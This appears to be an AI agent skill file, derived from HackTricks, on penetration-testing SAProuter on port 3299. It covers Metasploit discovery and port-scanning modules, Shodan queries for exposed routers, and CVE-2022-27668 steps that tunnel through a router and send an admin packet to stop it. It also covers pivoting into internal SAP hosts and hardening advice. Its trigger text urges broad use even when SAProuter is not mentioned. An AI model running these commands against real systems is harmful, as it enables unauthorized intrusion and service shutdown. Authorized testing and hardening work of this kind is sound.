OpenSkillIndex← back to search

Hacktricks-skills saprouter-pentest

How to pentest SAProuter (port 3299) for security assessments. Use this skill whenever the user mentions SAProuter, port 3299, SAP network penetration, SAP service discovery, or needs to enumerate/exploit SAP infrastructure. This skill covers Metasploit modules, CVE-2022-27668 exploitation, Nmap fingerprinting, and hardening recommendations. Make sure to use this skill for any SAP-related penetration testing, even if the user doesn't explicitly mention 'SAProuter' but describes SAP network access or port 3299 scanning.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/3299-pentesting-saprouter/SKILL.MD
source content

SAProuter Penetration Testing

A comprehensive guide for security professionals to assess SAProuter security, enumerate internal networks, and identify vulnerabilities in SAP infrastructure.

When to Use This Skill

Use this skill when:

  • You need to scan or enumerate SAProuter services (port 3299)
  • You're conducting a penetration test on SAP infrastructure
  • You need to check for CVE-2022-27668 or similar SAProuter vulnerabilities
  • You want to pivot through SAProuter to access internal networks
  • You need to harden or audit SAProuter configurations
  • You're investigating exposed SAP services on the internet

Quick Start

# Check if SAProuter is running on target
nmap -p 3299 --script=banner <target-ip>

# Or use Metasploit discovery module
msfconsole -q -x "use auxiliary/scanner/sap/sap_service_discovery; set RHOSTS <target>; run"

Phase 1: Discovery and Fingerprinting

Step 1: Confirm SAProuter Presence

First, verify that port 3299 is open and identify the service:

# Basic port scan
nmap -p 3299 <target-ip>

# Banner grabbing
nmap -p 3299 --script=banner <target-ip>

# Custom SAProuter probe (add to nmap scripts)
nmap -p 3299 --script=sap-router-info <target-ip>

Expected output:

PORT     STATE SERVICE    VERSION
3299/tcp open  saprouter? SAProuter 7.22 on 'hostname'

Step 2: Metasploit Service Discovery

Use the 

sap_service_discovery
module to confirm SAProuter presence:

msfconsole
use auxiliary/scanner/sap/sap_service_discovery
set RHOSTS <target-ip>
set RPORT 3299
run

What this does:

  • Sends SAP-specific probes to identify the service
  • Confirms if the target is actually running SAProuter
  • Helps distinguish from other services on port 3299

Step 3: Gather Router Information

Extract configuration details using 

sap_router_info_request
:

use auxiliary/scanner/sap/sap_router_info_request
set RHOSTS <target-ip>
set RPORT 3299
run

Information revealed:

  • Router hostname
  • SAProuter version
  • Potential internal network details
  • Connection path information

Phase 2: Internal Network Enumeration

Step 1: Port Scanning Through SAProuter

Use 

sap_router_portscanner
to discover internal services:

use auxiliary/scanner/sap/sap_router_portscanner
set RHOSTS <target-ip>
set RPORT 3299
set INSTANCES 00-50          # SAP instance range
set PORTS 32NN               # SAP standard ports (3200-3299)
run

Advanced scanning options:

# Scan specific ports
set PORTS 80,443,3299

# TCP mode for ACL mapping
set MODE TCP

# Target specific SAP systems
set PATHS /HOST:3299/SYS:3201

Step 2: ACL Mapping

Understand what connections are allowed or blocked:

use auxiliary/scanner/sap/sap_router_portscanner
set MODE TCP
set PORTS 80,32NN,443
set RHOSTS <target-ip>
run

What to look for:

  • Which internal hosts are reachable
  • Which ports are accessible
  • ACL restrictions and patterns
  • Potential pivot points

Step 3: Blind Host Enumeration

When direct information is limited, enumerate internal hostnames:

# Use common SAP hostname patterns
set PATHS /HOST:3299/SYS:3201
# Try: PRD, DEV, QAS, TEST, DMO, etc.

Common SAP system names to try:

  • PRD (Production)
  • DEV (Development)
  • QAS (Quality Assurance)
  • TEST (Testing)
  • DMO (Development Master)
  • HANA (SAP HANA database)

Phase 3: Exploitation and Pivoting

CVE-2022-27668 Exploitation

Critical vulnerability affecting SAProuter kernels ≥ 7.22 (CVSS 9.8).

Prerequisites:

  • Target running vulnerable SAProuter version
  • Permissive 
    saprouttab
    entries (wildcards)
  • Access to port 3299

Exploitation steps:

# 1. Build loopback tunnel through vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
                        -t 0.0.0.0    -r 3299 \
                        -a 127.0.0.1  -l 3299 -v

# 2. Send admin packet (stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299

# 3. Other admin commands available:
#    - trace-level (debug information)
#    - connection-kill (terminate connections)
#    - shutdown (stop service)

Affected versions:

  • Stand-alone SAProuter 7.22 / 7.53
  • Kernel 7.49, 7.77, 7.81, 7.85–7.88

Mitigation:

  • Apply SAP Note 3158375
  • Remove wildcard entries from 
    saprouttab
  • Start router without 
    -X
    option
  • Don't expose directly to internet

Pivoting Through SAProuter

Use Metasploit's proxy capabilities to access internal services:

# Set up proxy through SAProuter
set Proxies sapni:<router-ip>:3299
set RHOSTS <internal-ip>

# Example: Enumerate internal SAP hosts
use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
set Proxies sapni:1.2.3.101:3299
set RHOSTS 192.168.1.18
run

Proxy types:

  • sapni:
    - SAP Network Interface proxy
  • socks4:
    - SOCKS4 proxy
  • socks5:
    - SOCKS5 proxy

Phase 4: Advanced Techniques

Using pysap Framework

The 

pysap
framework provides powerful tools for SAProuter testing:

# Install pysap
pip install pysap

# Available tools:
# router_portfw.py - Port forwarding/tunneling
# router_admin.py - Admin packet crafting
# router_trace.py - Trace level manipulation

Nmap Custom Probes

Add custom SAProuter detection to Nmap:

Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/

Shodan Queries

Find exposed SAProuter instances:

port:3299 !HTTP Network packet too big
port:3299 SAProuter

Hardening Recommendations

Immediate Actions

  1. Firewall Configuration

    • Filter port 3299/TCP on perimeter firewall
    • Allow traffic only from trusted SAP support networks
    • Implement IP whitelisting

  2. Patch Management

    • Keep SAProuter fully patched
    • Verify with 
      saprouter -v
    • Compare against latest kernel patch level

  3. Configuration Hardening

    • Use strict, host-specific entries in 
      saprouttab
    • Avoid 
      *
      wildcards in P/S rules
    • Deny rules targeting arbitrary hosts/ports

  4. Service Hardening

    • Start with 
      -S <secudir>
      + SNC for encryption
    • Disable remote administration (
      -X
      )
    • Bind listener to 
      127.0.0.1
      if possible
    • Use external reverse proxy for required traffic

Monitoring

Monitor 

dev_rout
log for:

  • Suspicious 
    ROUTER_ADM
    packets
  • Unexpected 
    NI_ROUTE
    requests to 
    0.0.0.0
  • Failed connection attempts
  • Unusual traffic patterns

Common Metasploit Modules

ModulePurposeCommand
sap_service_discovery
Initial service detection
use auxiliary/scanner/sap/sap_service_discovery
sap_router_info_request
Extract router info
use auxiliary/scanner/sap/sap_router_info_request
sap_router_portscanner
Internal port scanning
use auxiliary/scanner/sap/sap_router_portscanner
sap_hostctrl_getcomputersystem
Host enumeration
use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem

Troubleshooting

Connection Issues

# Check if port is actually open
telnet <target> 3299
nc -zv <target> 3299

# Verify SAProuter is responding
nmap -p 3299 --script=banner <target>

Module Errors

# Ensure Metasploit has SAP modules
search sap

# Check module compatibility
info auxiliary/scanner/sap/sap_service_discovery

References

Legal Disclaimer

This skill is for authorized security assessments only. Always obtain proper authorization before testing any systems. Unauthorized access to computer systems is illegal and may result in criminal charges.